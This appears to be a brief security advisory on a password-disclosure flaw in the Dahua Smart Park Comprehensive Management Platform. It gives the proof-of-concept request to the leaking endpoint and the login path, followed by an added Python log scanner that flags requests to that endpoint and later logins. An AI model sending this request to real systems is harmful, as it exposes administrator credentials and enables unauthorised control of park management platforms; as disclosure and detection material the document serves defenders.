Dahua Smart Park Comprehensive Management Platform user_getUserInfoByUserName.action Account Password Leakage Vulnerability

Vulnerability Description

The Dahua Smart Park Comprehensive Management Platform exposes an API endpoint, user_getUserInfoByUserName.action, that leaks the account password of the park management account.

Vulnerability Impact

Smart Park Comprehensive Management Platform

Network surveying and mapping

Vulnerability Reproduction

PoC request

/admin/user_getUserInfoByUserName.action?userName=system

After obtaining the account password, access the login address:

/admin/login_login.action
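
For defenders, a log check for the two requests above, as an added example that is not part of the original post. It assumes web access logs in combined log format and a 30-minute correlation window; the sample log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in combined log format (not from the original post).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1" 200 412 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2024:10:03:40 +0000] "POST /admin/login_login.action HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:05:00 +0000] "POST /admin/login_login.action HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Mar/2024:11:00:00 +0000] "GET /admin/User_GetUserInfoByUserName.action?userName=admin HTTP/1.1" 404 0 "-" "-"
"""

# client IP, timestamp, method, URL, status (log format is an assumption)
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
LEAK = "/admin/user_getuserinfobyusername.action"
LOGIN = "/admin/login_login.action"

def find_exposure(log_text, window=timedelta(minutes=30)):
    """Return (leak_hits, followups): every request to the leaking endpoint,
    and logins from the same client within `window` of a 200 response from it."""
    leak_hits, followups, last_ok = [], [], {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, _method, url, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        # Compare case-insensitively so probing with altered casing is also logged.
        path = url.split("?", 1)[0].lower()
        if path == LEAK:
            leak_hits.append((ip, when, url, int(status)))
            if status == "200":
                last_ok[ip] = when  # response may have carried a password
        elif path == LOGIN and ip in last_ok and when - last_ok[ip] <= window:
            followups.append((ip, when))
    return leak_hits, followups

if __name__ == "__main__":
    hits, logins = find_exposure(SAMPLE_LOG)
    for ip, when, url, status in hits:
        print(f"leak endpoint hit  {ip} {when} {status} {url}")
    for ip, when in logins:
        print(f"login after leak   {ip} {when}")
```

Any 200 response in the first list means the returned account's password should be treated as disclosed and rotated.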

This post is licensed under CC BY 4.0 by the author.